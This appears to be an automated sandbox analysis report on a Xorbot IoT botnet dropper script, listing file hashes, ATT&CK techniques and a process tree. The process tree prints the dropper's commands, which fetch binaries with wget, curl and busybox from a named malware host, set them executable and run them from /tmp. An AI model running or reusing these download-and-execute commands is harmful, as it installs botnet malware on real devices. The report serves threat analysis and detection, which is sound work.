xorbot | 31285c2fc7a4946bbe369644a0f91c5a117506470e6a23c836ac6552453886ab

Analysis

max time kernel
149s
max time network
146s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
01-12-2024 19:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

8ae54f0e0f74b5a181db92d49daa45e7
SHA1

b918cd3ab6ac9947b2385bcbfb5eaaca0c8fe441
SHA256

31285c2fc7a4946bbe369644a0f91c5a117506470e6a23c836ac6552453886ab
SHA512

6015f204ecece96a555b142815f0ac7d1f538069d33fa58468d9ca789becaff424727f6ea4815c8fd9a8e67aa0efb80921b8a089bb9623846035fe6304de4cf6
SSDEEP

96:YZxN+79+79+7p7m7iYLrvPjzPARLueaUb3jl7XgLRJJqikj/nLHb0okHBXJBUxtx:NyydMfnARWKSaehyydMjEO

Score

10^/10

xorbot botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral4/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
824	chmod

Executes dropped EXE 1 IoCs

Processes:

v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr

ioc	pid	Process
/tmp/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr	825	v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurl

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetcurlbusyboxwgetcurl

pid	Process
721	wget
743	curl
745	busybox
828	wget
829	curl

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlwget

description	ioc	Process
File opened for modification	/tmp/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr	curl
File opened for modification	/tmp/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:714
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:717
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:721
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:743
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  - System Network Configuration Discovery
  PID:745
- /bin/chmod
  chmod 777 v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  ./v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  - Executes dropped EXE
  PID:825
- /bin/rm
  rm v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yfdXILH5qcoyJWU1KMdps8Yn1Kx3aUxrim
  2⤵
  - System Network Configuration Discovery
  PID:828
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yfdXILH5qcoyJWU1KMdps8Yn1Kx3aUxrim
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:829

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/v3HxLlxwTFjtXd29uVAcXFocllAgzxhwAr

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit